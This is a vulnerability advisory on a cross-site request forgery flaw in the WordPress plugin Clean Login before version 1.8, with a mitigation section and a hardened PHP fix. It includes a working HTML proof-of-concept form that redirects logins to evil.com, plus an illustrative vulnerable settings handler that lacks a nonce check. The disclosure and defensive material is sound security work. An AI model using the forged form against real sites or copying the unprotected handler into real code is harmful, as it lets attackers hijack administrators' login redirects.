WordPress Clean Login Cross Site Request Forgery

2017-05-09T00:00:00
ID PACKETSTORM:142426
Type packetstorm
Reporter Zhiyang Zeng
Modified 2017-05-09T00:00:00

Description

                                        
                                            `===============  
  
Software Description  
  
===============  
  
Software: Clean Login

Version: < 1.8

Description: Responsive Frontend Login and Registration plugin.
  
  
========  
  
Details  
  
========  
  
A CSRF vulnerability in the WordPress plugin Clean Login allows a remote attacker to change the WordPress login redirect URL or logout redirect URL to an attacker-controlled address. The settings handler behind admin.php?page=wpcsw_settings accepts the POSTed option values without a nonce or referer check, so any forged form submitted by a logged-in administrator's browser is saved.
  
  
========  
  
POC:  
  
========  
  
<form method="POST" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=wpcsw_settings">

<input type="text" name="adminbar" value="on">
<input type="text" name="emailnotificationcontent" value="">
<input type="text" name="termsconditionsMSG" value="">
<input type="text" name="termsconditionsURL" value="">
<input type="text" name="urlredirect" value="http://127.0.0.1/wordpress">
<input type="text" name="loginredirect" value="on">
<input type="text" name="loginredirect_url" value="http://evil.com">
<input type="text" name="logoutredirect_url" value="http://127.0.0.1/wordpress">
<input type="text" name="cl_hidden_field" value="hidden_field_to_update_others">
<input type="text" name="Submit" value="Save Changes">
<input type="submit">

</form>
  
  
=========  
  
Mitigations  
  
================  
  
Disable the plugin until a new version is released that fixes this bug.  
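A nonce check is the standard WordPress defense against this bug class. The handler below is added here as an illustration and is not Clean Login's own code: the option names and the wpcsw_settings page slug are taken from the PoC above, while the function names and the cl_save_settings nonce action are assumptions.

```php
<?php
// Added illustration, not Clean Login's own code. Option names mirror the PoC;
// the nonce action "cl_save_settings" and the function names are assumptions.

// Vulnerable pattern: any POST to admin.php?page=wpcsw_settings is trusted, so a
// form on a third-party site, submitted by a logged-in admin, rewrites the options.
function cl_save_settings_vulnerable() {
    if ( isset( $_POST['Submit'] ) ) {
        update_option( 'loginredirect_url',  $_POST['loginredirect_url'] );
        update_option( 'logoutredirect_url', $_POST['logoutredirect_url'] );
    }
}

// Hardened pattern: require the capability, verify a nonce bound to the current
// user's session and this form, and constrain redirect targets to this site.
function cl_save_settings_hardened() {
    if ( ! isset( $_POST['Submit'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // Dies with a 403 when the nonce is missing, expired or minted for another user.
    check_admin_referer( 'cl_save_settings', 'cl_settings_nonce' );

    $home = home_url( '/' );
    // wp_validate_redirect() returns $fallback for hosts outside this site, so the
    // http://evil.com value from the PoC collapses to the site's own URL.
    $login_url  = wp_validate_redirect( esc_url_raw( wp_unslash( $_POST['loginredirect_url'] ?? '' ) ), $home );
    $logout_url = wp_validate_redirect( esc_url_raw( wp_unslash( $_POST['logoutredirect_url'] ?? '' ) ), $home );

    update_option( 'loginredirect_url',  $login_url );
    update_option( 'logoutredirect_url', $logout_url );
}

// The legitimate settings form must emit the matching nonce field so real saves pass.
function cl_render_settings_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin.php?page=wpcsw_settings' ) ); ?>">
        <?php wp_nonce_field( 'cl_save_settings', 'cl_settings_nonce' ); ?>
        <input type="text" name="loginredirect_url"
               value="<?php echo esc_attr( get_option( 'loginredirect_url', '' ) ); ?>">
        <input type="text" name="logoutredirect_url"
               value="<?php echo esc_attr( get_option( 'logoutredirect_url', '' ) ); ?>">
        <input type="submit" name="Submit" value="Save Changes">
    </form>
    <?php
}
```

With the hardened handler in place, the forged form from the PoC fails at check_admin_referer() because the attacker's page cannot read or predict the victim's nonce, and even a correctly nonced request cannot point the redirect off-site.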
  
  
=========  
  
Fixed  
  
=========  
  
https://wordpress.org/plugins/clean-login/#developers (version 1.8 update)
  